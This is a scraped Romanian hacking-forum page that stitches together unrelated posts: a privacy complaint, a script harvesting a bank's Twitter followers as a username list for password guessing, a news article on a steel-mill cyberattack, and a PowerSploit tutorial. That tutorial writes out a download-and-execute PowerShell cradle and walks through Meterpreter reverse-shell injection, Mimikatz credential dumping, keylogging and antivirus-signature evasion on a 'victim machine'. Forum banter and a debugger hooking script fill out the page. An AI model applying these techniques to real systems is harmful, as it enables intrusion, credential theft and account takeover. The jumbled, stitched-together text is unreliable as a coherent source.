Leaderboard

Aici vine si problema cu datele private. Eu fac un document in care scriu un text. Ei fac o "perchezitie" si imi violeaza mie intimitatea, citindu-mi secretul (care nu are treaba cu internetul sau cu securitatea). Baiul e ca ei probabil nu vor doar "perchezitii pe HDD" ci si sa foloseasca exploituri sau back-connect sa-ti cotobaie prin calculator, poate si sniffing de la ISP. Asemenea lege, care sa permita unei institutii access total la un sistem informatic privat nu mai exista nicaieri, si nu poate sa existe. Care ar fi implicatiile daca SRI ar "verifica" serverele unor firme mari, copia date confidentiale si dezvalui secrete? Pe mine ca user nu ma afecteaza. Fac patch la orice exploit la zi, folosesc SSL si in caz ca-mi vine acasa (pe langa ca am HDD-ul criptat) neg ca as avea PC si invoc faptul ca au nevoie de mandat sa-mi intre in casa.

Many corporations are not aware of the types of data that can be found and used by attackers in the wild. The information that you will be able to find will vary from target to target, but will typically include items such as IP ranges, domain names, e-mail addresses, public financial data, organizational information, technologies used, job titles, phone numbers, usernames and much more. The primary goal of the passive gathering stage is to gather as much actionable data as possible while at the same time leaving few or no indicators that anyone has searched for the data. It takes time and patience to sort through web pages, perform Google hacking, and map systems thoroughly in an attempt to understand the infrastructure of a particular target. In this article, let’s assume that we have a task to perform a penetration test for an online banking system to verify the ability of guessing valid usernames and passwords. If you were a hacker, what would you do? Speaking for myself, first I would write up a quick script to create a dictionary file for potential usernames. Secondly, I would find out the company password policy (like password length, number of special character and so on), and based on that, I would build my own password dictionary file. Finally, I would automate the process to see if I can get a correct password or maybe perform a DoS and block the account after X numbers of failed attempts!! Many users are using the same username for their bank account, Facebook, Twitter, and other social media. So let’s forge a small Python script to illustrate how an attacker could use an ordinary publicly available information and build up a dictionary file which contains Twitter followers for Arab Bank. At the time of writing this article, Arab Bank has around 24,027 followers. Let’s bring them up! **Disclaimer: all of actions explained in this article are counted under Passive Information Gathering and considered legitimate. We just spotlight a smart way of data collection.** Build your own dictionary file Twitter and many social websites have something called API < Application Programming Interface > which allows a programmer to write his own code to interact with Twitter and Get/Post information from/to Twitter. Fortunately we have many libraries in Python that make my job much easier, so all I need to do is to register in Twitter developers and use the developer ID/keys in my script to run. The registration process should be something similar to these snapshots: Tweepy is a Python third-party library allow us to parse Twitter’s data. Installing Tweepy is pretty easy: hkhrais@Hkhrais:~$ sudo apt-get install python-pip hkhrais@Hkhrais:~$ sudo pip install tweepy Source Code import tweepy import time #insert your Twitter keys here consumer_key ='blah blah blah' consumer_secret='blah blah blah' access_token='blah blah blah' access_secret='blah blah blah' auth = tweepy.auth.OAuthHandler(consumer_key, consumer_secret) auth.set_access_token(access_token, access_secret) api = tweepy.API(auth) list= open('/<a title="home" href="http://resources.infosecinstitute.com/">home</a>/hkhrais/Desktop/list.txt','w') if(api.verify_credentials): print 'We sucessfully logged in' user = tweepy.Cursor(api.followers, screen_name="arabbankgroup").items() while True: try: u = next(user) list.write(u.screen_name +' n') except: time.sleep(15*60) print 'We got a timeout ... Sleeping for 15 minutes' u = next(user) list.write(u.screen_name +' n') list.close() The code is almost self explanatory. I passed consumer/token keys to function “OauthHandler” to identify/authenticate myself to Twitter, and after that I asked to get the followers ID for ‘arabbankgroup’ and store it in variable “user”. According to the Twitter development paper, there’s a limit for how many requests a program can ask. In the case of getting the followers ID, we should wait around 15 minutes, otherwise a limit excess exception will show up. tweepy.error.TweepError: [{'message': 'Rate limit exceeded', 'code': 88}] Execution Output hkhrais@Hkhrais:~/Desktop/Tweets$ sudo python Twitter.py [sudo] password for hkhrais: We successfully logged in We got a timeout ... Sleeping for 15 minutes We got a timeout ... Sleeping for 15 minutes We got a timeout ... Sleeping for 15 minutes We got a timeout ... Sleeping for 15 minutes ... We got a timeout ... Sleeping for 15 minutes Traceback (most recent call last): File "Twitter.py", line 31, in <module> u = next(user) File "/usr/local/lib/python2.7/dist-packages/tweepy/cursor.py", line 181, in next self.current_page = self.page_iterator.next() File "/usr/local/lib/python2.7/dist-packages/tweepy/cursor.py", line 64, in next raise StopIteration StopIteration hkhrais@Hkhrais:~/Desktop/Tweets$ Note that the last exception indicates iteration completion, which means we’ve grabbed the whole list of followers’ usernames the result: Conclusion Intelligence gathering requires careful planning, research, and, most importantly, the ability to think like an attacker. With a small Python script (around 25 lines), we could retrieve 24,027 followers’ usernames for @arabbankgroup which can be used as a good dictionary of usernames. Keep in mind that this script gets very handy, especially if our target usernames are non English! References • Twitter API https://dev.twitter.com/docs/twitter-libraries • Tweepy library https://pypi.python.org/pypi/tweepy/ Source

Amid all the noise the Sony hack generated over the holidays, a far more troubling cyber attack was largely lost in the chaos. Unless you follow security news closely, you likely missed it. I’m referring to the revelation, in a German report released just before Christmas (.pdf), that hackers had struck an unnamed steel mill in Germany. They did so by manipulating and disrupting control systems to such a degree that a blast furnace could not be properly shut down, resulting in “massive”—though unspecified—damage. This is only the second confirmed case in which a wholly digital attack caused physical destruction of equipment. The first case, of course, was Stuxnet, the sophisticated digital weapon the U.S. and Israel launched against control systems in Iran in late 2007 or early 2008 to sabotage centrifuges at a uranium enrichment plant. That attack was discovered in 2010, and since then experts have warned that it was only a matter of time before other destructive attacks would occur. Industrial control systems have been found to be rife with vulnerabilities, though they manage critical systems in the electric grid, in water treatment plants and chemical facilities and even in hospitals and financial networks. A destructive attack on systems like these could cause even more harm than at a steel plant. It’s not clear when the attack in Germany took place. The report, issued by Germany’s Federal Office for Information Security (or BSI), indicates the attackers gained access to the steel mill through the plant’s business network, then successively worked their way into production networks to access systems controlling plant equipment. The attackers infiltrated the corporate network using a spear-phishing attack—sending targeted email that appears to come from a trusted source in order to trick the recipient into opening a malicious attachment or visiting a malicious web site where malware is downloaded to their computer. Once the attackers got a foothold on one system, they were able to explore the company’s networks, eventually compromising a “multitude” of systems, including industrial components on the production network. “Failures accumulated in individual control components or entire systems,” the report notes. As a result, the plant was “unable to shut down a blast furnace in a regulated manner” which resulted in “massive damage to the system.” According to the report, the attackers appeared to possess advanced knowledge of industrial control systems. “The know-how of the attacker was very pronounced not only in conventional IT security but extended to detailed knowledge of applied industrial controls and production processes,” the report says. The report doesn’t name the plant or indicate when the breach first occurred or how long the hackers were in the network before the destruction occurred. It’s also unclear if the attackers intended to cause the physical destruction or if this was simply collateral damage. The incident underscores, however, what experts have been warning about in the wake of Stuxnet: although that nation-state digital weapon had been expertly designed to avoid collateral damage, not all intrusions into critical infrastructure are likely to be as careful or as well-designed as Stuxnet, so damage may occur even when the hackers never intend it. The report also illustrates the need for strict separation between business and production networks to keep hackers from leaping from one network to another and remotely accessing critical systems over the internet. Although a network can only be considered truly air-gapped if it’s not connected to the internet and is not connected to other systems that are connected to the internet, many companies believe that a software firewall separating the business and production network is sufficient to stop hackers from making that leap. But experts warn that a software firewall can be misconfigured or contain security holes that allow hackers to break through or bypass them nonetheless. It’s not known how the German network was configured. Source

Am gasit si: OpenSSL Toolkit 1.0.1k Download

pana mea ... vreun hint ceva la megacuc?

Asta-ti spune ceva?

buna ziua as dori sa stiu si eu cum pot primi o invitatie pe filelist....ma poate ajuta cineva?multumesc

Am folosit libraria jquery.facedetection,recunoaste fata din imagine si o incadreaza intr-un chenar(facebook style). DOWNLOAD

Original Apollo 11 guidance computer (AGC) source code, in assmebly, for Command Module (Comanche054) and Lunar Module (Luminary099). DOWNLOAD

PowerSploit is a collection of PowerShell scripts which can prove to be very useful during some exploitation and mostly post-exploitation phases of a penetration test. To get the latest version of PowerSploit, visit this URL: https://github.com/mattifestation/PowerSploit If you have GIT, then you can simply run the following command to get all files from the github repository: git clone https://github.com/mattifestation/PowerSploit.git To run PowerSploit scripts, you should have Microsoft PowerShell installed. It comes installed on Windows 7 and above operating system versions. Here, the current scenario is: we have a remote desktop connection to the victim machine (Windows 7 Ultimate 64-bit) which has PowerShell installed, and we run PowerSploit tools on it. For our ease to access and run PowerSploit scripts on the victim machine, we start a web server using Python: python -m SimpleHTTPServer Now all the files in the PowerSploit directory can easily be accessed over http://<ip_address>:8000/ PowerSploit has categorized all the scripts in a pretty clear and organized manner: Category Description Antivirus Bypass Find bytes of a file which has a matching signature in antivirus. Code Execution Used to execute code on victim machine. Exfiltration Manipulate and collect information & data from victim machine(s). Persistence Maintain control to machine by adding persistence to scripts. PE Tools Handy PowerShell cmdlets for enumeration. Recon Perform reconnaissance tasks using victim machine. Reverse Engineering Help perform reverse engineering & malware analysis. It has now been moved to PowerShellArsenal. Script Modification Create and manipulate scripts on victim machine. In this article, as many PowerSploit scripts will be covered as possible. Those not covered are left for the reader to try and test. Depending upon the script you run, it might require a certain environment to work (like an Active Directory for some scripts in Exfiltration). Install and run a PowerShell script: IEX (New-Object Net.WebClient).DownloadString(“http://<ip_address>/full_path/script_name.ps1”) This command when run in PowerShell will install that PowerShell for the current process of PowerShell only. Invoke-Shellcode This cmdlet can be used to inject a custom shellcode or Metasploit payload into a new or existing process and execute it. The advantage of using this script is that it is not flagged by an antivirus, and no file is written on disk. We can easily install the Code Execution PowerShell script “Invoke-ShellCode” using: Run the above command in a PowerShell window to install “Invoke-Shellcode” script. To get some information about the module type: Get-Help Invoke-Shellcode Inject payload into the current PowerShell process and receive a Meterpreter Reverse HTTPS shell: Also we had setup a Multi Handler exploit and compatible payload in Metasploit. Executing the above PowerSploit script will give us a Meterpreter shell. Please note that at the time of writing this article, only two Metasploit payloads are supported: windows/meterpreter/reverse_http windows/meterpreter/reverse_https If you want to inject into some other process, you can either create a new process and then inject in it or inject inside an existing process. Inject in an existing process: Get Process ID (PID) of a process using “Get-Process”. Note that the “Id” field is the Process ID (PID) of the corresponding process name. Inject the Metasploit payload into “svchost” process with PID 1228. Note that I have removed “-Force” switch from the command, due to which it is asking for user confirmation now before injecting payload. After injecting the shellcode, we receive a Meterpreter shell on the attacking machine, as shown below: Inject in a new process: Create a new hidden process and inject the payload into it: And we got a Meterpreter shell on the attacking machine: Invoke-DllInjection This cmdlet is used to inject a DLL file into an existing process using its Process ID (PID). Using this feature, a DLL can easily be injected in processes. The only disadvantage with this cmdlet is that it requires the DLL to be written on the disk. We can easily install the Code Execution PowerShell script “Invoke-DllInjection” using: Generate the Metasploit Meterpreter DLL and download it on the server: Upload this DLL onto the victim machine using an HTTP download or any other medium of your choice. Create a process in hidden mode and inject the DLL into it. We received a successful Meterpreter shell on the attacking machine: Find-AVSignature This cmdlet is used to split a file into specific byte sizes. The split bytes are stored in separate files, which will be detected by the installed antivirus and quarantined or removed. By noting the removed files, we can easily find the parts of file which have the AV signature. We can easily install the AntiVirus Bypass PowerShell script “Find-AVSignature” using: Running “Find-AVSignature” on a Meterpreter Windows executable: The installed antivirus detected malicious files and we can see bytes with the AV signature: Now we can see the bytes of “msf.exe” containing AV signatures. Get-DllLoadPath This cmdlet can be used to find the path at which an executable looks for the DLL we are querying for. For example, we want to know at what location “cmd.exe” is looking for the “shell32.dll” DLL file. Using this information, we can replace the original DLL with a malicious DLL and get it executed to receive a reverse shell or any other task. This technique can be very useful for privilege escalation. We can easily install the PE Tools PowerShell script “Find-DllLoadPath” using: Find where “Acrobat.exe” loads “shell32.dll” DLL from: Invoke-Portscan This cmdlet is used to run a port scan on other hosts and find open ports. You will find a number of similarities between Nmap and this cmdlet, but not all. We can easily install the Recon PowerShell script “Invoke-Portscan” using: Run a port scan for a list of hosts and ports: There are a number of options using which you can customize the port scan. Use “Get-Help Invoke-PortScan –full” for all options. It also supports saving output in files just like Nmap (GNMAP, NMAP and XML) using -oG, -oX and -oA switches respectively. Invoke-ReverseDnsLookup This cmdlet is used to find the DNS PTR record for corresponding IP address(es). We can easily install the Recon PowerShell script “Invoke-ReverseDnsLookup” using: Execute the cmdlet using the below command which accepts IP or IP range in “-IpRange” switch: Unfortunately, it does not support comma separated values or file input of ranges like 173.194.117.1-50. It accepts only single IP or CIDR format for IP range. Get-HttpStatus This cmdlet is used to dictionary a web server to find HTTP Status of a path or file on HTTP/HTTPS service. It is not very feature rich and does not support a nested dictionary attack. It accepts a file containing path name or file name to check for HTTP Status on a web server. We can easily install the Recon PowerShell script “Get-HttpStatus” using: Execute this cmdlet using the following command (the dictionary file is that of DirBuster): If the website is running on SSL, you can use the “-UseSSL” switch to send HTTPS requests: If the service is running on some other port like 8080, 8000, etc, for defining a port use the “-Port” switch. It is not as good as the DirBuster tool, but it’s good to have the PowerShell script too. Get-Strings This cmdlet is used to find Unicode or ASCII characters in a file. It is similar to what we have in UNIX based systems, the “strings” utility. We can easily install the Reverse Engineering PowerShell script “Get-Strings” using: Get-Strings -Path <file_name_with_path> It is similar to the “strings” utility that we have in Linux. But here we have it for PowerShell ? Note that Reverse Engineering has been moved from PowerSploit to PowerToolsArsenal (https://github.com/mattifestation/PowerShellArsenal) now. Invoke-Mimikatz This cmdlet is a port of the original Mimikatz project in PowerShell. The benefit of using this over the Mimikatz executable is that it remains in memory. It can be used to dump credentials, certificates, etc from the local computer or other computers in the domain. It is one of the most useful PowerSploit tools in a penetration testing engagement. We can easily install the Exfiltration PowerShell script “Invoke-Mimikatz” using: Dump credentials using: Invoke-Mimikatz -DumpCreds You can even dump credentials and certificates of other computers using -ComputerName @(“computer1,….) Get-Keystrokes This cmdlet is used to log the keystrokes which are pressed on the victim machine. It can be used as a keylogger. But all the logged keystorkes are stored in a local file on default (temp directory) or custom location. We can easily install the Exfiltration PowerShell script “Get-Keystrokes” using: This cmdlet can be executed using the following command: Key log is stored in: c:usersmasterdesktopkeylogger.txt This script also supports “-CollectionInterval” using which you can define after how many minutes keystrokes should be captured. Do note that the key logging is very detailed, containing pressed button, username, application name and timestamp. Invoke-NinjaCopy This cmdlet is used to copy protected files which cannot be copied when the operating system is running. We can easily install an Exfiltration PowerShell script “Invoke-NinjaCopy” using: Execute “Invoke-NinjaCopy” using the following the command to copy the protected “SAM” file: When you try to perform the same operation using the “copy” command, the file cannot be copied: Source

Linkuri pentru doritori: https://www.dropbox.com/sh/xepvhylyda64a0z/AAAOndgT2lgNse2uNaqrKI00a?dl=0 Spor la treaba!

<?php // 200 threads foreach(array_chunk($links, count($links)/200) as $threadChunk){ if(!pcntl_fork()){ // aici parsezi $threadChunk si le verifici exit; } } while (pcntl_waitpid(0, $status) != -1) { $status = pcntl_wexitstatus($status); }

Nu se poate.

There are a lot of ways to modify the execution of a program, including at least using Windows Compatibility Toolkit (a good reference is Mark Baggett’s Derbycon talk), modifying the environment, manual patching the binary before it runs, and function hooking. Function hooking generally refers to any method where you’re able to intercept and modify function calls of a running process. A simple example of a function hook might be “every time the program calls AESEncrypt, first save the plaintext to a file and then call AESEncrypt”. There are also many different ways to function hook, and in my opinion there isn’t really a “best” way – it just depends on what you’re trying to do. For example, if you’re doing something to try to be sneaky, one of the best ways may be like Joe outlines here: Reflectively load your DLL using powershell so nothing needs to ever touch disk In your DLL, write a C function that contains the functionality to execute. Optionally, return control to the original function Overwrite the first bytes of the function to jump to your DLL However, if your goal is to change the behavior of a program and you don’t care about stealth (e.g. you’re just using hooking as an aid to testing) there are easier ways to accomplish the same goal. “soft” function hooking usually refers to attaching a debugger to a program and using the debugger’s functionality to modify the behavior. I’ve seen this approach elsewhere – in gray hat python, they use this technique with pydbg and immunitydbg. I learned about pykd because of mona for windb. I messed with pykd last week, and I like it quite a bit (at least more than windbg plugin alternatives I’ve used like powerdbg). There are pluses and minuses when compared with something like immunity debugger. Pykd doesn’t currently have nearly the number of convenience functions immunitydbg has (for example, you have to store your strings in memory manually). UPDATE: In this case I was looking for something like remotevirtualalloc and didn’t see it. But @corelanc0d3r pointed me at windbglib, which has these exact convenience functions. But Windbg is just a more powerful debugger. For example, immunitydbg is awesome, but it doesn’t work with 64 bit processes, following children processes, kernel debugging, etc. Here is a simple example. I ran into a situation where a team’s test box had a hard coded a test server to listen only on localhost. This can be a pain to debug, because a lot of my tools are on other boxes and plus I can’t do things like see what’s actually going on with wireshark. This is a quick script that modifies the behavior of inet_addr, which is where this binary passed the hard coded localhost to (if you’re wondering why I didn’t just patch it – that was an option too, but there was some other important stuff right next to it in .data and ‘localhost’ was too small to fit my IP). So this hook simply grabs the current IP and passes it as the arg to inet_addr instead of “localhost” Some things I got a bit stuck on Use the second argument with setBP to have a callback function on the breakpoints, and then use this to modify things. Note you can’t mess with execution within the function itself. Before going this route I tried to use the EventHandlers (like onBreakPoint) and ended up with weird errors. Within your callback function, if you return True (or nothing), execution will halt, and if you return False then execution will continue #!/usr/bin/python import pykd import socket #pykd script to modify inet_addr calls to a supplied IP address def getAddress(localAddr): res = pykd.dbgCommand("x " + localAddr) if res.count("\n") > 1: print "[-] Warning, more than one result for", localAddr return res.split()[0] class handle_inet(pykd.eventHandler): def __init__(self): #pykd.eventHandler.__init__(self) self.localAddr = socket.gethostbyname(socket.gethostname()) print "[+] Using ip address: " + self.localAddr bp_init = getAddress("WS2_32!inet_addr") self.bp_init = pykd.setBp(int(bp_init, 16), self.handle_inet_begin) self.bp_end = None pykd.go() def handle_inet_begin(self, args): print args print "[+] At start of inet_addr." ow_len = len(self.localAddr) + 1 #just save our string below us on the stack. We'll restore it on return #ret_addr = pykd.dbgCommand("k1").split("\n")[1].split()[1] #k doesn't work in win7, wtf self.ret_addr = pykd.dbgCommand("dd esp L1").split()[1] print "[+] saving return ptr: " + self.ret_addr self.bp_end = pykd.setBp(int(self.ret_addr, 16), self.handle_inet_end) self.stack_addr = pykd.reg("esp") + 500 print "[+] using this stack address to save our string: " + hex(self.stack_addr) self.old_stack = pykd.loadBytes(self.stack_addr, ow_len) print "[+] Writing over old stack stuff" pykd.dbgCommand("ea " + hex(self.stack_addr) + " \"" + self.localAddr + '"') #null terminate pykd.dbgCommand("eb " + hex(self.stack_addr) + "+" + hex(len(self.localAddr)) + " 00") #esp + 4 is the IP address parameter for inet_addr pykd.dbgCommand("ed esp+4 " + hex(self.stack_addr)) #Since this is a conditional bp, this makes the debugger continue return False def handle_inet_end(self, bp): if self.bp_end == bp: print "[+] Call complete" old_stack = " ".join([hex(i)[2:] for i in self.old_stack]) pykd.dbgCommand("eb " + hex(self.stack_addr) + " " + old_stack) print "[+] Old stack stuff restored" self.bp_end = None #Since this is a conditional bp, this makes the debugger continue return False d_handle = handle_inet() If you know windbg basics and python, this should be really familiar – I have a tiny bit of python to grab the IP, and then inside the handlers I’m pretty much just running windbg commands sequentially. I ran this in the debugger itself. Here’s a side tip. You can run put commands in a textfile for them to run in windbg (similar to gdb’s -x arg). So you can do this to load this pykd script automatically. > type windbg.txt .load pykd.pyd !py local_listen.py > windbg -c "$$><windbg.txt" server1.exe Another options would be to run this directly from the command line, which is also doable. Just use the pykd “attachProcess” or “startProcess” functions and go from there. Source

Bai futardel, du-te fa-ti revelionul in real life nu pe un chat.

Fake and gay. Closed! Apropo, sectiunea asta nu e inlocuitoare pentru threadul de "fun stuff"